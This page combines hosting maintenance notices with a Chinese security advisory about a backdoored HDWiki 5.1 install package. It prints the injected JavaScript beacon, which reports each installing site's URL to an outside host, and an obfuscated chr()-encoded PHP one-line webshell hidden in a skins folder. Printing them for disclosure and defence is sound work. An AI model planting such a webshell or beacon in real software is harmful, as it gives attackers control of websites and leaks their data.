接江苏联通运营商通知,将于北京时间2025-04-02 00:00至2025-04-02 06:00对淮安联通机房进行割接维护,涉及 IP段112.84.222.0/25 、2408:873C:9810:1000::/96。
为提供更好更优质的云防御服务,我们将于近期对机房节点进行优化和调整,天津电信机房将不再提供服务,涉及IPv4网段:42.81.219.0/25、IPv6网段:240e:928:501:9::/96。
北京时间 2025-03-02 00:00~01:00 报表及日志服务将进行维护。在此期间,可能会导致报表查询/下载及日志下载功能不可用。若您有相关操作需求,请避开此时段进行。
获取最新安全动态
9月20日消息,今日安全联盟站长平台(zhanzhang.anquan.org)接到漏洞修复专家反馈信息称HDWiki百科建站系统“HDWiki5.1 正式版”(包括UTF8和GBK版本)下载安装包文件里被植入恶意网站木马(后门)文件。安全联盟研究人员立即确认并分析了该“木马后门”,初步推断官方网站被黑客入侵后,在最新HDwiki的下载安装包里植入了恶意网站木马文件,当站长用户下载安装后,会把该网站木马文件直接带入到站长的网站上,然后黑客可通过该该网站木马完全控制站长用户的网站系统,使网站沦为“肉鸡”。目前安全联盟站长平台已积极联系HDwiki官方,并发布紧急预警,目前请站长朋友们暂停下载安装HDWiki百科建站系统,对近期下载安装过HDwiki的朋友,百度加速乐(jiasule.baidu.com)联合安全联盟站长平台提供独家解决方案。
后门文件分析
经过我们分析,在HDWiki安装文件包里的文件做了如下修改:
一、在文件/hdwiki/install/install.php里 83-84行加入了如下代码:
if(!window.x){ (function(){(new Image()).src='http://kaiyuan.hudong.com/count2/install.php?location='+escape((function(){try{return document.location.href}catch(e){return ''}})());})();
二、增加一个php文件,也就是我们的木马文件,位置在/hdwiki/js/jqeditor/skins/bg/index.php 代码如下:
<?php /* [UCenter] (C)2001-2009 Comsenz Inc. This is NOT a freeware, use is subject to license terms $Id: client.php 913 2009-01-12 03:48:34Z zhaoxiongfei $ */ $a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[马赛克]); ?>代码经过了编码加密,我们解密后确认该代码就是一个恶意的网站木马文件(编码加密过的“一句话木马”)。
售前支持
400-161-0866